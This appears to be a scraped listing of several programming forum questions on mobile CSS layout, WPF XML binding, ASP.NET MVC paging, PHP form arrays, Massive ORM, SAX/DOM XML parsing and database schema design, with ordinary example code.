    Read the article

  • Android Web App : Position:fixed broken?

    - by StevenGilligan
    Hi all, I'm in the process of developping a Web Application for mobiles. I went with web applications because to me it seems a winning situation having to develop one application that could run also on iPhone / Windows Mobile / Palm etc. I started testing today after a few days of doing concepts, ideas and designs and what I wanted to do was have a menu that sticks at the bottom of the page. Exactly like the menu on the bottom in this iPhone application screenshot : http://farm4.static.flickr.com/3094/2656904921_1c54e93b4f.jpg Using CSS, I though it would be really easy to do this. Only using position:fixed; bottom:0; would have done the trick but I have found it doesn't behave the same on mobile browsers I tried to split my page in 2 sections : 1 would be a scrollable div (for the content) and the other one would be the bottom menu. Scrollable divs also do not work on Android. I also tried using frames with no luck either. Does anyone know of any way to re-create a menu that would stick to the bottom of a page for mobile phones? Thank you, Steven

    Read the article

  • Great examples of self-paced labs and exercises

    - by Mayo
    It is probably a safe bet that many of us are what they call Tactile / Kinesthetic Learners meaning that we learn best when we are physically doing something as opposed to listening to an online tutorial or reading a book. My goal with this question is to derive a list of books or online resources that serve as superb examples of self-paced programming labs and exercises. For example, I was extremely impressed with the SportsStore exercise in Steven Sanderson's Pro ASP.NET MVC Framework. The exercise spanned multiple chapters and gradually introduced new topics. I was also impressed with the materials associated with the Windows Azure Boot Camp. The demos and lab materials, accessible through the website, allow us to practice and reinforce what we can read about in articles and books. Please list any examples you might have, one per submission, below. The question is language/platform agnostic. Suggestions can be generic or specific to a given technology (PHP, SQL Server, Azure, Flash, Objective C, etc.). I only ask that the answers pertain to labs and exercises that relate to programming. My hope is that the best answers will float to the top allowing developers to review the top answers and find another programming topic that can be learned through example.

    Read the article

  • Converter problem with XmlDataProvider

    - by Andrew
    Sorry for this, I've just started programming with wpf. I can't seem to figure out why the following xaml displays "System.Xml.XmlElement" instead of the actual xml node content. This is displayed 5 times in the listbox whenever I run it. Not sure where I'm going wrong... <Window x:Class="TestBinding.Window1" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" Title="Window1" Height="300" Width="300"> <Window.Resources> <XmlDataProvider x:Key="myXmlSource" XPath="/root"> <x:XData> <root xmlns=""> <name>Steve</name> <name>Arthur</name> <name>Sidney</name> <name>Billy</name> <name>Steven</name> </root> </x:XData> </XmlDataProvider> <DataTemplate x:Key="shmooga"> <TextBlock Text="{Binding}"/> </DataTemplate> </Window.Resources> <Grid> <ListBox ItemTemplate="{StaticResource shmooga}" ItemsSource="{Binding Source={StaticResource myXmlSource}, XPath=name}"> </ListBox> </Grid> </Window> Any help would be very much appreciated. Thanks!

    Read the article

  • paging helper asp.net mvc

    - by csetzkorn
    Hi, I have implemented a paging html helper (adapted from steven sanderson's book). This is the current code: public static string PageLinks(this HtmlHelper html, int currentPage, int totalPages, Func pageUrl) { StringBuilder result = new StringBuilder(); for (int i = 1; i <= totalPages; i++) { TagBuilder tag = new TagBuilder("a"); tag.MergeAttribute("href", pageUrl(i)); tag.InnerHtml = i.ToString(); if (i == currentPage) tag.AddCssClass("selectedPage"); result.AppendLine(tag.ToString()); } return result.ToString(); } This produces a bunch of links to each page of my items. If there are many pages this can be a bit overwhelming. I am looking for a similar implementation which produces something less overwhelming like this: where 6 is the current page. I am sure someone must have implemented something similar ... before I have to re-implement the wheel. Thanks. Christian

    Read the article

  • How to send array by post method

    - by GanChinHock.com
    Following is my sample form. <form METHOD="post" METHOD="post" ACTION="index.php" METHOD="post" METHOD="post" METHOD="post"> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="submit" NAME="submit" VALUE="Submit" /> </form> Basically I have 10 inputs of array. Assume my domain is http://domain.com and the file above is index.php. I am trying to fill the form automatically by using the following method. http://domain.com/index.php?array[]=John&array[]=Kelly ... & array[]=Steven Unfortunately, it is not working. :(

    Read the article

  • Dependecy Injection with Massive ORM: dynamic trouble

    - by Sergi Papaseit
    I've started working on an MVC 3 project that needs data from an enormous existing database. My first idea was to go ahead and use EF 4.1 and create a bunch of POCO's to represent the tables I need, but I'm starting to think the mapping will get overly complicated as I only need some of the columns in some of the tables. (thanks to Steven for the clarification in the comments. So I thought I'd give Massive ORM a try. I normally use a Unit of Work implementation so I can keep everything nicely decoupled and can use Dependency Injection. This is part of what I have for Massive: public interface ISession { DynamicModel CreateTable<T>() where T : DynamicModel, new(); dynamic Single<T>(string where, params object[] args) where T : DynamicModel, new(); dynamic Single<T>(object key, string columns = "*") where T : DynamicModel, new(); // Some more methods supported by Massive here } And here's my implementation of the above interface: public class MassiveSession : ISession { public DynamicModel CreateTable<T>() where T : DynamicModel, new() { return new T(); } public dynamic Single<T>(string where, params object[] args) where T: DynamicModel, new() { var table = CreateTable<T>(); return table.Single(where, args); } public dynamic Single<T>(object key, string columns = "*") where T: DynamicModel, new() { var table = CreateTable<T>(); return table.Single(key, columns); } } The problem comes with the First(), Last() and FindBy() methods. Massive is based around a dynamic object called DynamicModel and doesn't define any of the above method; it handles them through a TryInvokeMethod() implementation overriden from DynamicObject instead: public override bool TryInvokeMember(InvokeMemberBinder binder, object[] args, out object result) { } I'm at a loss on how to "interface" those methods in my ISession. How could my ISession provide support for First(), Last() and FindBy()? Put it another way, how can I use all of Massive's capabilities and still be able to decouple my classes from data access?

    Read the article

  • how i can use SAX parser

    - by moustafa
    This is what the result should look like when i parse it through a SAX parser http://img13.imageshack.us/img13/6950/75914446.jpg This is the XML source code from which i need to generate the display: <orders> <order> <count>37</count> <price>49.99</price> <book> <isbn>0130897930</isbn> <title>Core Web Programming Second Edition</title> <authors> <count>2</count> <author>Marty Hall</author> <author>Larry Brown</author> </authors> </book> </order> <order> <count>1</count> <price>9.95</price> <yacht> <manufacturer>Luxury Yachts, Inc.</manufacturer> <model>M-1</model> <standardFeatures oars="plastic" lifeVests="none">false</standardFeatures> </yacht> </order> <order> <count>3</count> <price>22.22</price> <book> <isbn>B000059Z4H</isbn> <title>Harry Potter and the Order of the Phoenix</title> <authors> <count>1</count> <author>J.K. Rowling</author> </authors> </book> </order> i really have no clue how to code the functions but i have just set up the parser $xmlParser = xml_parser_create("UTF-8"); xml_parser_set_option($xmlParser, XML_OPTION_CASE_FOLDING, false); xml_set_element_handler($xmlParser, 'startElement', 'endElement'); xml_set_character_data_handler($xmlParser, 'HandleCharacterData'); $fileName = 'orders.xml'; if (!($fp = fopen($fileName, 'r'))){ die('Cannot open the XML file: ' . $fileName); } while ($data = fread($fp, 4096)){ $parsedOkay = xml_parse($xmlParser, $data, feof($fp)); if (!$parsedOkay){ print ("There was an error or the parser was finished."); break; } } xml_parser_free($xmlParser); function startElement($xmlParser, $name, $attribs) { } function endElement($parser, $name) { } function HandleCharacterData($parser, $data) { }

    Read the article

  • xml dom node children

    - by matt
    Need some help I've got lots of code and i want to make it shorter i know there's a way but I can't remember it this is code example: <?xml version="1.0" encoding="ISO-8859-1"?> <bookstore> <book category="cooking"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="children"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="web"> <title lang="en">XQuery Kick Start</title> <author>James McGovern</author> <author>Per Bothner</author> <author>Kurt Cagle</author> <author>James Linn</author> <author>Vaidyanathan Nagarajan</author> <year>2003</year> <price>49.99</price> </book> <book category="web" cover="paperback"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore As you can see the different nodes, children now is there a way to make this code smaller so I don't have to keep writing the nodes and children

    Read the article

  • problem with Using SAX parser

    - by moustafa
    Hi guys i have this small class task that im having trouble with. I need to create a PHP file using SAX to generate the display shown below from an XML file. Im not sure how to Use | to represent its level, where the root element orders is at level zero. This is what the result should look like when i parse it through a SAX parser http://img13.imageshack.us/img13/6950/75914446.jpg This is the XML source code from which i need to generate the display: <orders> <order> <count>37</count> <price>49.99</price> <book> <isbn>0130897930</isbn> <title>Core Web Programming Second Edition</title> <authors> <count>2</count> <author>Marty Hall</author> <author>Larry Brown</author> </authors> </book> </order> <order> <count>1</count> <price>9.95</price> <yacht> <manufacturer>Luxury Yachts, Inc.</manufacturer> <model>M-1</model> <standardFeatures oars="plastic" lifeVests="none">false</standardFeatures> </yacht> </order> <order> <count>3</count> <price>22.22</price> <book> <isbn>B000059Z4H</isbn> <title>Harry Potter and the Order of the Phoenix</title> <authors> <count>1</count> <author>J.K. Rowling</author> </authors> </book> </order>

    Read the article

  • Normalizing Item Names & Synonyms

    - by RabidFire
    Consider an e-commerce application with multiple stores. Each store owner can edit the item catalog of his store. My current database schema is as follows: item_names: id | name | description | picture | common(BOOL) items: id | item_name_id | picture | price | description | picture item_synonyms: id | item_name_id | name | error(BOOL) Notes: error indicates a wrong spelling (eg. "Ericson"). description and picture of the item_names table are "globals" that can optionally be overridden by "local" description and picture fields of the items table (in case the store owner wants to supply a different picture for an item). common helps separate unique item names ("Jimmy Joe's Cheese Pizza" from "Cheese Pizza") I think the bright side of this schema is: Optimized searching & Handling Synonyms: I can query the item_names & item_synonyms tables using name LIKE %QUERY% and obtain the list of item_name_ids that need to be joined with the items table. (Examples of synonyms: "Sony Ericsson", "Sony Ericson", "X10", "X 10") Autocompletion: Again, a simple query to the item_names table. I can avoid the usage of DISTINCT and it minimizes number of variations ("Sony Ericsson Xperia™ X10", "Sony Ericsson - Xperia X10", "Xperia X10, Sony Ericsson") The down side would be: Overhead: When inserting an item, I query item_names to see if this name already exists. If not, I create a new entry. When deleting an item, I count the number of entries with the same name. If this is the only item with that name, I delete the entry from the item_names table (just to keep things clean; accounts for possible erroneous submissions). And updating is the combination of both. Weird Item Names: Store owners sometimes use sentences like "Harry Potter 1, 2 Books + CDs + Magic Hat". There's something off about having so much overhead to accommodate cases like this. This would perhaps be the prime reason I'm tempted to go for a schema like this: items: id | name | picture | price | description | picture (... with item_names and item_synonyms as utility tables that I could query) Is there a better schema you would suggested? Should item names be normalized for autocomplete? Is this probably what Facebook does for "School", "City" entries? Is the first schema or the second better/optimal for search? Thanks in advance! References: (1) Is normalizing a person's name going too far?, (2) Avoiding DISTINCT

    Read the article

< Previous Page | 23 24 25 26 27 28 29  | Next Page >